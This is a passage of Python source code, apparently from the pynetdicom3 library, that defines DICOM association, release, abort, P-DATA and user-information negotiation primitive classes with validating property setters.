parameter.\"\"\"\n return self._calling_ae_title\n\n @calling_ae_title.setter\n def calling_ae_title(self, value):\n \"\"\"Set the Calling AE Title parameter.\n\n Parameters\n ----------\n value : str or bytes\n The Calling AE Title as a string or bytes object. Cannot be an empty\n string and will be truncated to 16 characters long\n \"\"\"\n # pylint: disable=attribute-defined-outside-init\n if isinstance(value, str):\n value = codecs.encode(value, 'utf-8')\n\n if value is not None:\n self._calling_ae_title = validate_ae_title(value)\n else:\n self._calling_ae_title = None\n\n @property\n def called_ae_title(self):\n \"\"\"Return the Called AE Title parameter.\"\"\"\n return self._called_ae_title\n\n @called_ae_title.setter\n def called_ae_title(self, value):\n \"\"\"Set the Called AE Title parameter.\n\n Parameters\n ----------\n value : str or bytes\n The Called AE Title as a string or bytes object. 
Cannot be an empty\n string and will be truncated to 16 characters long\n \"\"\"\n # pylint: disable=attribute-defined-outside-init\n if isinstance(value, str):\n value = codecs.encode(value, 'utf-8')\n\n if value is not None:\n self._called_ae_title = validate_ae_title(value)\n else:\n self._called_ae_title = None\n\n @property\n def responding_ae_title(self):\n \"\"\"Return the Responding AE Title parameter.\"\"\"\n return self.called_ae_title\n\n @property\n def user_information(self):\n \"\"\"Return the User Information parameter.\"\"\"\n return self._user_information\n\n @user_information.setter\n def user_information(self, value_list):\n \"\"\"Set the A-ASSOCIATE primitive's User Information parameter.\n\n Parameters\n ----------\n value_list : list of pynetdicom3 user information class objects\n A list of user information objects, must contain at least\n MaximumLengthNegotiation and ImplementationClassUIDNotification\n \"\"\"\n # pylint: disable=attribute-defined-outside-init\n valid_usr_info_items = []\n\n if isinstance(value_list, list):\n # Iterate through the items and check they're an acceptable class\n for item in value_list:\n if item.__class__.__name__ in \\\n [\"MaximumLengthNegotiation\",\n \"ImplementationClassUIDNotification\",\n \"ImplementationVersionNameNotification\",\n \"AsynchronousOperationsWindowNegotiation\",\n \"SCP_SCU_RoleSelectionNegotiation\",\n \"SOPClassExtendedNegotiation\",\n \"SOPClassCommonExtendedNegotiation\",\n \"UserIdentityNegotiation\"]:\n valid_usr_info_items.append(item)\n else:\n LOGGER.info(\"Attempted to set \"\n \"A_ASSOCIATE.user_information to a list \"\n \"which includes an unsupported item\")\n else:\n LOGGER.error(\"A_ASSOCIATE.user_information must be a list\")\n raise TypeError(\"A_ASSOCIATE.user_information must be a list\")\n\n self._user_information = valid_usr_info_items\n\n @property\n def result(self):\n \"\"\"Return te Result parameter.\"\"\"\n return self._result\n\n @result.setter\n def result(self, value):\n \"\"\"Set the A-ASSOCIATE Service primitive's Result parameter.\n\n Parameters\n ----------\n value : str\n One of the following:\n * 0: accepted\n * 1: rejected (permanent)\n * 2: rejected (transient)\n \"\"\"\n # pylint: disable=attribute-defined-outside-init\n if value is None:\n pass\n elif value not in [0, 1, 2]:\n LOGGER.error(\"A_ASSOCIATE.result set to an unknown value\")\n raise ValueError(\"Unknown A_ASSOCIATE.result value\")\n\n self._result = value\n\n @property\n def result_source(self):\n \"\"\"Return the Result Source parameter.\"\"\"\n return self._result_source\n\n @result_source.setter\n def result_source(self, value):\n \"\"\"Set the A-ASSOCIATE Service primitive's Result Source parameter.\n\n Parameters\n ----------\n value : int\n One of the following:\n * 1: UL service-user\n * 2: UL service-provider (ACSE related function)\n * 3: UL service-provider (presentation related function)\n \"\"\"\n # pylint: disable=attribute-defined-outside-init\n if value is None:\n pass\n elif value not in [1, 2, 3]:\n LOGGER.error(\"A_ASSOCIATE.result_source set to an unknown value\")\n raise ValueError(\"Unknown A_ASSOCIATE.result_source value\")\n\n self._result_source = value\n\n @property\n def diagnostic(self):\n \"\"\"Return the Diagnostic parameter.\"\"\"\n return self._diagnostic\n\n @diagnostic.setter\n def diagnostic(self, value):\n \"\"\"\n Set the A-ASSOCIATE Service primitive's Diagnostic parameter\n\n Parameters\n ----------\n value : int\n If `result_source` is \"UL service-user\" then allowed values 
are:\n * 1: no reason given\n * 2: application context name not supported\n * 3: calling AE title not recognised\n * 7: called AE title not recognised\n If `result_source` is \"UL service-provider (ACSE related function)\"\n then allowed values are:\n * 1: no reason given\n * 2: protocol version not supported\"\n If `result_source` is \"UL service-provider (Presentation related\n function)\" then allowed values are:\n * 1: temporary congestion\n * 2: local limit exceeded\n \"\"\"\n # pylint: disable=attribute-defined-outside-init\n if value is None:\n pass\n elif value not in [1, 2, 3, 7]:\n LOGGER.error(\"A_ASSOCIATE.diagnostic set to an unknown value\")\n raise ValueError(\"Unknown A_ASSOCIATE.diagnostic value\")\n\n self._diagnostic = value\n\n @property\n def calling_presentation_address(self):\n \"\"\"Return the Calling Presentation Address parameter.\"\"\"\n return self._calling_presentation_address\n\n @calling_presentation_address.setter\n def calling_presentation_address(self, value):\n \"\"\"\n Set the A-ASSOCIATE Service primitive's Calling Presentation\n Address parameter\n\n Parameters\n ----------\n value : (str, int) tuple\n A tuple containing a valid TCP/IP address string and the port number\n as an int\n \"\"\"\n # pylint: disable=attribute-defined-outside-init\n if isinstance(value, tuple):\n if len(value) == 2 and isinstance(value[0], str) \\\n and isinstance(value[1], int):\n self._calling_presentation_address = value\n else:\n LOGGER.error(\"A_ASSOCIATE.calling_presentation_address must \"\n \"be (str, int) tuple\")\n raise TypeError(\"A_ASSOCIATE.calling_presentation_address \"\n \"must be (str, int) tuple\")\n elif value is None:\n self._calling_presentation_address = value\n else:\n LOGGER.error(\"A_ASSOCIATE.calling_presentation_address must be \"\n \"(str, int) tuple\")\n raise TypeError(\"A_ASSOCIATE.calling_presentation_address must \"\n \"be (str, int) tuple\")\n\n @property\n def called_presentation_address(self):\n \"\"\"Return the Called Presentation Address parameter.\"\"\"\n return self._called_presentation_address\n\n @called_presentation_address.setter\n def called_presentation_address(self, value):\n \"\"\"Set the Called Presentation Address parameter.\n\n Parameters\n ----------\n value : (str, int) tuple\n A tuple containing a valid TCP/IP address string and the port number\n as an int\n \"\"\"\n # pylint: disable=attribute-defined-outside-init\n if isinstance(value, tuple):\n if len(value) == 2 and isinstance(value[0], str) \\\n and isinstance(value[1], int):\n self._called_presentation_address = value\n else:\n LOGGER.error(\"A_ASSOCIATE.called_presentation_address must \"\n \"be (str, int) tuple\")\n raise TypeError(\"A_ASSOCIATE.called_presentation_address \"\n \"must be (str, int) tuple\")\n elif value is None:\n self._called_presentation_address = value\n else:\n LOGGER.error(\"A_ASSOCIATE.called_presentation_address must be \"\n \"(str, int) tuple\")\n raise TypeError(\"A_ASSOCIATE.called_presentation_address must \"\n \"be (str, int) tuple\")\n\n @property\n def responding_presentation_address(self):\n \"\"\"Get the Responding Presentation Address parameter.\"\"\"\n return self.called_presentation_address\n\n @property\n def presentation_context_definition_list(self):\n \"\"\"Get the Presentation Context Definition List.\"\"\"\n return self._presentation_context_definition_list\n\n @presentation_context_definition_list.setter\n def presentation_context_definition_list(self, value_list):\n \"\"\"\n Set the A-ASSOCIATE Service primitive's 
Presentation Context Definition\n List parameter\n\n Parameters\n ----------\n value_list : list of pynetdicom3.utils.PresentationContext\n The Presentation Contexts proposed by the Association Requestor\n \"\"\"\n # pylint: disable=attribute-defined-outside-init\n if isinstance(value_list, list):\n valid_items = []\n for item in value_list:\n if isinstance(item, PresentationContext):\n valid_items.append(item)\n else:\n LOGGER.warning(\"Attempted to set \"\n \"A_ASSOCIATE.presentation_context_definition_list to \"\n \"a list which includes an invalid items\")\n\n self._presentation_context_definition_list = valid_items\n\n else:\n LOGGER.error(\"A_ASSOCIATE.presentation_context_definition_list \"\n \"must be a list\")\n raise TypeError(\"A_ASSOCIATE.presentation_context_definition_list \"\n \"must be a list\")\n\n @property\n def presentation_context_definition_results_list(self):\n \"\"\"Get the Presentation Context Definition Results List.\"\"\"\n return self._presentation_context_definition_results_list\n\n @presentation_context_definition_results_list.setter\n def presentation_context_definition_results_list(self, value_list):\n \"\"\"Set the Presentation Context Definition Results List parameter.\n\n Parameters\n ----------\n value_list : list of pynetdicom3.utils.PresentationContext\n The results of the Presentation Contexts proposal by the Association\n Requestor\n \"\"\"\n # pylint: disable=attribute-defined-outside-init\n if isinstance(value_list, list):\n valid_items = []\n for item in value_list:\n if isinstance(item, PresentationContext):\n valid_items.append(item)\n else:\n LOGGER.warning(\"Attempted to set A_ASSOCIATE.presentation\"\n \"_context_definition_results_list to a \"\n \"list which includes one or more invalid \"\n \"items.\")\n\n self._presentation_context_definition_results_list = valid_items\n\n else:\n LOGGER.error(\"A_ASSOCIATE.presentation_context_definition_\"\n \"results_list must be a list\")\n raise TypeError(\"A_ASSOCIATE.presentation_context_definition_\"\n \"results_list must be a list\")\n\n @property\n def presentation_requirements(self):\n \"\"\"Get the Presentation Kernel.\"\"\"\n return \"Presentation Kernel\"\n\n @property\n def session_requirements(self):\n \"\"\"Get the Session Requirements.\"\"\"\n return \"\"\n\n # Shortcut attributes for User Information items\n # Mandatory UI Items\n @property\n def maximum_length_received(self):\n \"\"\"Get the Maximum Length Received.\"\"\"\n for item in self.user_information:\n if isinstance(item, MaximumLengthNegotiation):\n return item.maximum_length_received\n\n return None\n\n @maximum_length_received.setter\n def maximum_length_received(self, value):\n \"\"\"Set the Maximum Length Received.\n\n If the A_ASSOCIATE.user_information list contains a\n MaximumLengthNegotiated item then set its maximum_length_received value.\n If not then add a MaximumLengthNegotiated item and set its\n maximum_length_received value.\n\n Parameters\n ----------\n value : int\n The maximum length of each P-DATA in bytes\n \"\"\"\n # Type and value checking for the maximum_length_received parameter is\n # done by the MaximumLengthNegotiated class\n\n # Check for a MaximumLengthNegotiation item\n found_item = False\n\n for item in self.user_information:\n if isinstance(item, MaximumLengthNegotiation):\n found_item = True\n item.maximum_length_received = value\n\n # No MaximumLengthNegotiated item found\n if not found_item:\n max_length = MaximumLengthNegotiation()\n max_length.maximum_length_received = value\n 
self.user_information.append(max_length)\n\n @property\n def implementation_class_uid(self):\n \"\"\"Return the Implementation Class UID.\"\"\"\n for item in self.user_information:\n if isinstance(item, ImplementationClassUIDNotification):\n if item.implementation_class_uid is None:\n LOGGER.error(\"Implementation Class UID has not been set\")\n raise ValueError(\"Implementation Class UID has not \"\n \"been set\")\n\n return item.implementation_class_uid\n\n LOGGER.error(\"Implementation Class UID has not been set\")\n raise ValueError(\"Implementation Class UID has not been set\")\n\n @implementation_class_uid.setter\n def implementation_class_uid(self, value):\n \"\"\"Set the Implementation Class UID.\n\n If the A_ASSOCIATE.user_information list contains an\n ImplementationClassUIDNotification item then set its\n implementation_class_uid value. If not then add a\n ImplementationClassUIDNotification item and set its\n implementation_class_uid value.\n\n Parameters\n ----------\n value : pydicom.uid.UID, bytes or str\n The value for the Implementation Class UID\n \"\"\"\n # Type and value checking for the implementation_class_uid parameter is\n # done by the ImplementationClassUIDNotification class\n\n # Check for a ImplementationClassUIDNegotiation item\n found_item = False\n for item in self.user_information:\n if isinstance(item, ImplementationClassUIDNotification):\n found_item = True\n item.implementation_class_uid = value\n\n # No ImplementationClassUIDNegotiation item found\n if not found_item:\n imp_uid = ImplementationClassUIDNotification()\n imp_uid.implementation_class_uid = value\n self.user_information.append(imp_uid)\n\n\nclass A_RELEASE(object):\n \"\"\"\n A-RELEASE Parameters\n\n The release of an association between two AEs shall be performed through\n ACSE A-RELEASE request, indication, response and confirmation primitives.\n The initiator of the service is called a Requestor and the service-user that\n receives the A-RELEASE indication is called the acceptor.\n\n Service Procedure\n\n 1. The user (Requestor) that desires to end the association issues an\n A-RELEASE request primitive. The Requestor shall not issue any other\n primitives other than A-ABORT until it receives an A-RELEASE confirmation\n primitive.\n 2. The DUL provider issues an A-RELEASE indication to the Acceptor. The\n Acceptor shall not issue any other primitives other than A-RELEASE response,\n A-ABORT request or P-DATA request.\n 3. To complete the release, the Acceptor replies using an A-RELEASE response\n primitive, with \"affirmative\" as the result parameter.\n 4. After the Acceptor issues the A-RELEASE response it shall not issue any\n more primitives.\n 5. The Requestor shall issue an A-RELEASE confirmation primitive always\n with an \"affirmative\" value for the Result parameter.\n 6. A user may disrupt the release by issuing an A-ABORT request.\n 7. A collision may occur when both users issue A-RELEASE requests\n simultaneously. In this situation both users receive an unexpect A-RELEASE\n indication primitive (instead of an A-RELEASE acceptance):\n\n a. The association requestor issues an A-RELEASE response primitive\n b. The association acceptor waits for an A-RELEASE confirmation\n primitive from its peer. When it receives one it issues an A-RELEASE\n response primitive\n c. 
The association requestor receives an A-RELEASE confirmation\n primitive.\n\n When both ACSE users have received an A-RELEASE confirmation primitive the\n association shall be released.\n\n Parameter Request Indication Response Confirmation\n reason UF UF(=) UF UF(=)\n user info NU NU(=) NU NU(=)\n result MF MF(=)\n\n UF - User option, fixed\n NU - Not used\n MF - Mandatory, fixed\n (=) - shall have same value as request or response\n\n See PS3.8 Section 7.2\n\n Attributes\n ----------\n reason : str\n Fixed value of \"normal\". Identifies the general level of urgency of the\n request\n PS3.8 7.2.1.1, [UF, UF(=), UF, UF(=)]\n result : str or None\n Must be None for request and indication, \"affirmative\" for response\n and confirmation\n PS3.8 7.2.1.2, [-, -, MF, MF(=)]\n \"\"\"\n\n def __init__(self):\n self.result = None\n\n @property\n def reason(self):\n \"\"\"Return the Reason parameter.\"\"\"\n return \"normal\"\n\n @property\n def result(self):\n \"\"\"Return the Result parameter.\"\"\"\n return self._result\n\n @result.setter\n def result(self, value):\n \"\"\"Set the Result parameter.\"\"\"\n # pylint: disable=attribute-defined-outside-init\n if value is not None and value != \"affirmative\":\n LOGGER.error(\"A_RELEASE.result must be None or 'affirmative'\")\n raise ValueError(\"A_RELEASE.result must be None or 'affirmative'\")\n\n self._result = value\n\n\nclass A_ABORT(object):\n \"\"\"A-ABORT Parameters\n\n See PS3.8 Section 7.3.1\n\n Attributes\n ----------\n abort_source : int\n Indicates the initiating source of the abort. Allowed values are:\n * 0: UL service-user\n * 2: UL service-provider\n\n PS3.8 7.3.1.1, [-, M, X, X]\n \"\"\"\n\n def __init__(self):\n self.abort_source = None\n\n @property\n def abort_source(self):\n \"\"\"Return the Abort Source.\"\"\"\n if self._abort_source is None:\n LOGGER.error(\"A_ABORT.abort_source parameter not set\")\n raise ValueError(\"A_ABORT.abort_source value not set\")\n\n return self._abort_source\n\n @abort_source.setter\n def abort_source(self, value):\n \"\"\"Set the Abort Source.\"\"\"\n # pylint: disable=attribute-defined-outside-init\n if value in [0, 2]:\n self._abort_source = value\n elif value is None:\n self._abort_source = None\n else:\n LOGGER.error(\"Attempted to set A_ABORT.abort_source to an \"\n \"invalid value\")\n raise ValueError(\"Attempted to set A_ABORT.abort_source to an \"\n \"invalid value\")\n\n\nclass A_P_ABORT(object):\n \"\"\"A-P-ABORT Parameters.\n\n See PS3.8 Section 7.4.1\n\n Attributes\n ----------\n provider_reason : int\n Indicates the reason for the abort. 
Allowed values are:\n * 0: reason not specified\n * 1: unrecognised PDU\n * 2: unexpected PDU\n * 4: unrecognised PDU parameter\n * 5: unexpected PDU parameter\n * 6: invalid PDU parameter value\n\n PS3.8 7.3.1.1, [P, X, X, X]\n \"\"\"\n\n def __init__(self):\n self.provider_reason = None\n\n @property\n def provider_reason(self):\n \"\"\"Return the Provider Reason.\"\"\"\n if self._provider_reason is None:\n LOGGER.error(\"A_ABORT.provider_reason parameter not set\")\n raise ValueError(\"A_ABORT.provider_reason value not set\")\n\n return self._provider_reason\n\n @provider_reason.setter\n def provider_reason(self, value):\n \"\"\"Set the Provider Reason.\"\"\"\n # pylint: disable=attribute-defined-outside-init\n if value in [0, 1, 2, 4, 5, 6]:\n self._provider_reason = value\n elif value is None:\n self._provider_reason = None\n else:\n LOGGER.error(\"Attempted to set A_ABORT.provider_reason to an \"\n \"invalid value\")\n raise ValueError(\"Attempted to set A_ABORT.provider_reason to an \"\n \"invalid value\")\n\n\nclass P_DATA(object):\n \"\"\"P-DATA Parameters.\n\n See PS3.8 Section 7.6.1\n\n Attributes\n ----------\n presentation_data_value_list : list of [int, bytes]\n Contains one or more Presentation Data Values (PDV), each consisting of\n a Presentation Context ID and User Data values. The User Data values are\n taken from the Abstract Syntax and encoded in the Transfer Syntax\n identified by the Presentation Context ID. Each item in the list is\n [Context ID, PDV Data]\n PS3.8 7.6.1, [M, M(=), x, x]\n \"\"\"\n\n def __init__(self):\n self.presentation_data_value_list = []\n\n @property\n def presentation_data_value_list(self):\n \"\"\"Return the Presentation Data Value List.\"\"\"\n return self._presentation_data_value_list\n\n @presentation_data_value_list.setter\n def presentation_data_value_list(self, value_list):\n \"\"\"Set the Presentation Data Value List.\"\"\"\n # pylint: disable=attribute-defined-outside-init\n if isinstance(value_list, list):\n for pdv in value_list:\n if isinstance(pdv, list):\n if isinstance(pdv[0], int) and isinstance(pdv[1], bytes):\n pass\n else:\n raise TypeError(\"P_DATA.presentation_data_value_list \"\n \"should be a list of [int, bytes]\")\n else:\n raise TypeError(\"P_DATA.presentation_data_value_list \"\n \"should be a list of [ID, PDV]\")\n else:\n raise TypeError(\"P_DATA.presentation_data_value_list \"\n \"should be a list of [int, bytes]\")\n\n self._presentation_data_value_list = value_list\n\n def __str__(self):\n \"\"\"String representation of the class.\"\"\"\n s = 'P-DATA\\n'\n for pdv in self.presentation_data_value_list:\n s += ' Context ID: {0!s}\\n'.format(pdv[0])\n s += ' Value Length: {0!s} bytes\\n'.format(len(pdv[1]))\n header_byte = pdv[1][0]\n\n # Python 2 compatibility\n if isinstance(header_byte, str):\n header_byte = ord(header_byte)\n\n s += \" Message Control Header Byte: {:08b}\\n\".format(header_byte)\n\n # xxxxxx01 and xxxxxx011\n if header_byte & 1:\n # xxxxxx11\n if header_byte & 2:\n s += ' Command information, last fragment of the ' \\\n 'DIMSE message\\n'\n # xxxxxx01\n else:\n s += ' Command information, not the last fragment of ' \\\n 'the DIMSE message\\n'\n # xxxxxx00, xxxxxxx10\n else:\n # xxxxxx10\n if header_byte & 2 != 0:\n s += ' Dataset information, last fragment of the ' \\\n 'DIMSE message\\n'\n # xxxxxx00\n else:\n s += ' Dataset information, not the last fragment of ' \\\n 'the DIMSE message\\n'\n\n # Remaining data\n #s += pretty_bytes(pdv[1][1:], ' ', max_size=512)\n\n return s\n\n\n# User 
Information Negotiation primitives\nclass MaximumLengthNegotiation(ServiceParameter):\n \"\"\"Define the Maximum Length Negotiation primitive.\n\n The maximum length notification allows communicating AEs to limit the size\n of the data for each P-DATA indication. This notification is required for\n all DICOM v3.0 conforming implementations.\n\n This User Information item is required during Association negotiation and\n there must only be a single MaximumLengthNegotiation item\n\n PS3.7 Annex D.3.3.1 and PS3.8 Annex D.1\n\n Attributes\n ----------\n maximum_length_received : int\n The maximum length received value for the Maximum Length sub-item in\n bytes. A value of 0 indicates unlimited length (31682 bytes default).\n \"\"\"\n\n def __init__(self):\n self.maximum_length_received = 16382\n\n def from_primitive(self):\n \"\"\"Convert the primitive to a PDU item ready to be encoded.\n\n Returns\n -------\n item : pynetdicom3.pdu.MaximumLengthSubItem\n \"\"\"\n item = MaximumLengthSubItem()\n item.FromParams(self)\n\n return item\n\n @property\n def maximum_length_received(self):\n \"\"\"Return the Maximum Length Received.\"\"\"\n return self._maximum_length\n\n @maximum_length_received.setter\n def maximum_length_received(self, val):\n \"\"\"User defined Maximum Length to be used during an Association.\n\n Parameters\n ----------\n val : int\n The maximum length of each P-DATA in bytes, must be equal to or\n greater than 0. A value of 0 indicates an unlimited maximum length.\n\n Raises\n ------\n ValueError\n If `maximum_length_received` is negative\n TypeError\n If `maximum_length_received` is not an int\n \"\"\"\n # pylint: disable=attribute-defined-outside-init\n if isinstance(val, int):\n if val < 0:\n LOGGER.error('Maximum Length Received must be greater than 0')\n raise ValueError(\"Maximum Length Received must be greater \"\n \"than 0\")\n else:\n self._maximum_length = val\n else:\n LOGGER.error(\"Maximum Length Received must be numerical\")\n raise TypeError(\"Maximum Length Received must be numerical\")\n\n def __str__(self):\n \"\"\"String representation of the class.\"\"\"\n s = \"Maximum Length Negotiation\\n\"\n s += \" Maximum length received: {0:d} bytes\\n\".format(\n self.maximum_length_received)\n return s\n\n\nclass ImplementationClassUIDNotification(ServiceParameter):\n \"\"\"The Implementation Class UID Notification primitive.\n\n The implementation identification notification allows implementations of\n communicating AEs to identify each other at Association establishment time.\n It is intended to provider respective and non-ambiguous identification in\n the event of communication problems encountered between two nodes. 
This\n negotiation is required.\n\n Implementation identification relies on two pieces of information:\n - Implementation Class UID (required)\n - Implementation Version Name (optional)\n\n The Implementation Class UID is required during Association negotiation and\n there must only be a single ImplementationClassUID item\n\n PS3.7 Annex D.3.3.2\n\n Example\n -------\n impl_class_uid = ImplementationClassUID()\n impl_class_uid.implementation_class_uid = '1.1.2.2.3.3.4'\n\n usr_data_neg = []\n usr_data_neg.append(impl_class_uid)\n\n Attributes\n ----------\n implementation_class_uid : pydicom.uid.UID, bytes or str\n The UID to use\n \"\"\"\n\n def __init__(self):\n self.implementation_class_uid = None\n\n def from_primitive(self):\n \"\"\"Convert the primitive to a PDU item ready to be encoded.\n\n Returns\n -------\n item : pynetdicom3.pdu.ImplementationClassUIDSubItem\n\n Raises\n ------\n ValueError\n If no UID is set\n \"\"\"\n if self.implementation_class_uid is None:\n LOGGER.error(\"The Implementation Class UID must be set prior to \"\n \"requesting Association\")\n raise ValueError(\"The Implementation Class UID must be set \"\n \"prior to requesting Association\")\n\n item = ImplementationClassUIDSubItem()\n item.FromParams(self)\n\n return item\n\n @property\n def implementation_class_uid(self):\n \"\"\"Return the Implementation Class UID.\"\"\"\n return self._implementation_class_uid\n\n @implementation_class_uid.setter\n def implementation_class_uid(self, value):\n \"\"\"Sets the Implementation Class UID parameter.\n\n Parameters\n ----------\n value : pydicom.uid.UID, bytes or str\n The value for the Implementation Class UID\n \"\"\"\n # pylint: disable=attribute-defined-outside-init\n if isinstance(value, UID):\n pass\n elif isinstance(value, str):\n value = UID(value)\n elif isinstance(value, bytes):\n value = UID(value.decode('utf-8'))\n elif value is None:\n pass\n else:\n raise TypeError(\"Implementation Class UID must be a \"\n \"pydicom.uid.UID, str or bytes\")\n\n if value is not None and not value.is_valid:\n LOGGER.error(\"Implementation Class UID is an invalid UID\")\n raise ValueError(\"Implementation Class UID is an invalid UID\")\n\n self._implementation_class_uid = value\n\n def __str__(self):\n \"\"\"String representation of the class.\"\"\"\n s = \"Implementation Class UID\\n\"\n s += \" Implementation class UID: {0!s}\\n\" \\\n .format(self.implementation_class_uid)\n return s\n\n\nclass ImplementationVersionNameNotification(ServiceParameter):\n \"\"\"The Implementation Version Name Notification primitive.\n\n The implementation identification notification allows implementations of\n communicating AEs to identify each other at Association establishment time.\n It is intended to provider respective and non-ambiguous identification in\n the event of communication problems encountered between two nodes. 
This\n negotiation is required.\n\n Implementation identification relies on two pieces of information:\n - Implementation Class UID (required)\n - Implementation Version Name (optional)\n\n The Implementation Version Name is optional and there may only be a single\n ImplementationVersionName item\n\n PS3.7 Annex D.3.3.2\n\n Attributes\n ----------\n implementation_version_name : str or bytes\n The version name to use, maximum of 16 characters\n \"\"\"\n\n def __init__(self):\n self.implementation_version_name = None\n\n def from_primitive(self):\n \"\"\"Convert the primitive to a PDU item ready to be encoded.\n\n Returns\n -------\n item : pynetdicom3.pdu.ImplementationVersionNameSubItem\n\n Raises\n ------\n ValueError\n If no name is set\n \"\"\"\n if self.implementation_version_name is None:\n raise ValueError(\"Implementation Version Name must be set prior \"\n \"to Association\")\n\n item = ImplementationVersionNameSubItem()\n item.FromParams(self)\n\n return item\n\n @property\n def implementation_version_name(self):\n \"\"\"Return the Implementation Version Name.\"\"\"\n return self._implementation_version_name\n\n @implementation_version_name.setter\n def implementation_version_name(self, value):\n \"\"\"Sets the Implementation Version Name parameter.\n\n Parameters\n ----------\n value : str or bytes\n The value for the Implementation Version Name\n\n Raises\n ------\n TypeError\n If `value` is not a str or bytes\n ValueError\n If `value` is empty or longer than 16 characters\n \"\"\"\n # pylint: disable=attribute-defined-outside-init\n if isinstance(value, str):\n value = codecs.encode(value, 'utf-8')\n elif isinstance(value, bytes):\n pass\n elif value is None:\n pass\n else:\n LOGGER.error(\"Implementation Version Name must be a str or bytes\")\n raise TypeError(\"Implementation Version Name must be a str \"\n \"or bytes\")\n\n if value is not None and not 1 < len(value) < 17:\n raise ValueError(\"Implementation Version Name must be \"\n \"between 1 and 16 characters long\")\n\n self._implementation_version_name = value\n\n def __str__(self):\n \"\"\"String representation of the class.\"\"\"\n s = \"Implementation Version Name\\n\"\n s += \" Implementation version name: {0!s}\\n\".format(\n self.implementation_version_name)\n return s\n\n\nclass AsynchronousOperationsWindowNegotiation(ServiceParameter):\n \"\"\"\n Allows peer AEs to negotiate the maximum number of outstanding operation\n or sub-operation requests. This negotiation is optional.\n\n The Asynchronous Operations Window is optional and there may only be a\n single AsynchronousOperationsWindowNegotiation item\n\n PS3.7 Annex D.3.3.3\n\n Identical for both A-ASSOCIATE-RQ and A-ASSOCIATE-AC\n\n Attributes\n ----------\n maximum_number_operations_invoked : int\n The maximum number of asynchronous operations invoked by the AE. A\n value of 0 indicates unlimited operations (default 1)\n maximum_number_operations_performed : int\n The maximum number of asynchronous operations performed by the AE. 
A\n value of 0 indicates unlimited operations (default 1)\n \"\"\"\n\n def __init__(self):\n self.maximum_number_operations_invoked = 1\n self.maximum_number_operations_performed = 1\n\n def from_primitive(self):\n \"\"\"Convert the primitive to a PDU item ready to be encoded.\n\n Returns\n -------\n item : pynetdicom3.pdu.AsynchronousOperationsWindowSubItem\n \"\"\"\n item = AsynchronousOperationsWindowSubItem()\n item.FromParams(self)\n\n return item\n\n @property\n def maximum_number_operations_invoked(self):\n \"\"\"Return the Maximum Number Operations Invoked.\"\"\"\n return self._maximum_number_operations_invoked\n\n @maximum_number_operations_invoked.setter\n def maximum_number_operations_invoked(self, value):\n \"\"\"Sets the Maximum Number Operations Invoked parameter.\n\n Parameters\n ----------\n value : int\n The maximum number of operations invoked\n\n Raises\n ------\n TypeError\n If `value` is not an int\n ValueError\n If `value` is less than 0\n \"\"\"\n # pylint: disable=attribute-defined-outside-init\n if isinstance(value, int):\n pass\n else:\n LOGGER.error(\"Maximum Number Operations Invoked must be an int\")\n raise TypeError(\"Maximum Number Operations Invoked must be an int\")\n\n if value < 0:\n raise ValueError(\"Maximum Number Operations Invoked must be \"\n \"greater than 0\")\n\n self._maximum_number_operations_invoked = value\n\n @property\n def maximum_number_operations_performed(self):\n \"\"\"Return the Maximum Number Operations Performed.\"\"\"\n return self._maximum_number_operations_performed\n\n @maximum_number_operations_performed.setter\n def maximum_number_operations_performed(self, value):\n \"\"\"\n Sets the Maximum Number Operations Performed parameter\n\n Parameters\n ----------\n value : int\n The maximum number of operations performed\n\n Raises\n ------\n TypeError\n If `value` is not an int\n ValueError\n If `value` is less than 0\n \"\"\"\n # pylint: disable=attribute-defined-outside-init\n if not isinstance(value, int):\n LOGGER.error(\"Maximum Number Operations Performed must be an int\")\n raise TypeError(\"Maximum Number Operations Performed must be \"\n \"an int\")\n\n if value < 0:\n raise ValueError(\"Maximum Number Operations Performed must be \"\n \"greater than 0\")\n\n self._maximum_number_operations_performed = value\n\n def __str__(self):\n \"\"\"String representation of the class.\"\"\"\n s = \"Asynchronous Operations Window\\n\"\n s += \" Maximum number operations invoked: {0:d}\\n\".format(\n self.maximum_number_operations_invoked)\n s += \" Maximum number operations performed: {0:d}\\n\".format(\n self.maximum_number_operations_performed)\n return s\n\n\nclass SCP_SCU_RoleSelectionNegotiation(ServiceParameter):\n \"\"\"\n Allows peer AEs to negotiate the roles in which they will serve for each\n SOP Class or Meta SOP Class supported on the Association. 
This negotiation\n is optional.\n\n The Association Requestor may use one SCP/SCU Role Selection item for each\n SOP Class as identified by its corresponding Abstract Syntax Name and shall\n be one of three role values:\n - Requestor is SCU only\n - Requestor is SCP only\n - Requestor is both SCU/SCP\n\n If the SCP/SCU Role Selection item is absent the default role for a\n Requestor is SCU and for an Acceptor is SCP.\n\n For a Requestor support for each SOP Class shall be one of the following\n roles:\n * Requestor is SCU only\n * Requestor is SCP only\n * Requestor is both SCU and SCP\n\n PS3.7 Annex D.3.3.4\n\n Identical for both A-ASSOCIATE-RQ and A-ASSOCIATE-AC\n\n Attributes\n ----------\n sop_class_uid : pydicom.uid.UID, bytes or str\n The UID of the corresponding Abstract Syntax\n scu_role : bool\n False for non-support of the SCU role, True for support\n scp_role : bool\n False for non-support of the SCP role, True for support\n \"\"\"\n\n def __init__(self):\n self.sop_class_uid = None\n self.scu_role = None\n self.scp_role = None\n\n def from_primitive(self):\n \"\"\"\n Convert the primitive to a PDU item ready to be encoded\n\n Returns\n -------\n item : pynetdicom3.pdu.SCP_SCU_RoleSelectionSubItem\n\n Raises\n ------\n ValueError\n If no SOP Class UID, SCU Role or SCP Role is set\n ValueError\n If SCU Role and SCP Role are both False\n \"\"\"\n if self.sop_class_uid is None or self.scu_role is None \\\n or self.scp_role is None:\n LOGGER.error(\"SOP Class UID, SCU Role and SCP Role must \"\n \"to be set prior to Association\")\n raise ValueError(\"SOP Class UID, SCU Role and SCP Role must \"\n \"to be set prior to Association\")\n\n # To get to this point self.sop_class_uid must be set\n if not self.scu_role and not self.scp_role:\n LOGGER.error(\"SCU and SCP Roles cannot both be unsupported \"\n \"for %s\", self.sop_class_uid)\n raise ValueError(\"SCU and SCP Roles cannot both be unsupported \"\n \"for {}\".format(self.sop_class_uid))\n\n item = SCP_SCU_RoleSelectionSubItem()\n item.FromParams(self)\n\n return item\n\n @property\n def sop_class_uid(self):\n \"\"\"Return the SOP Class UID.\"\"\"\n return self._sop_class_uid\n\n @sop_class_uid.setter\n def sop_class_uid(self, value):\n \"\"\"Sets the SOP Class UID parameter.\n\n Parameters\n ----------\n value : pydicom.uid.UID, bytes or str\n The corresponding Abstract Syntax UID\n\n Raises\n ------\n TypeError\n If `value` is not a pydicom.uid.UID, bytes or str\n \"\"\"\n # pylint: 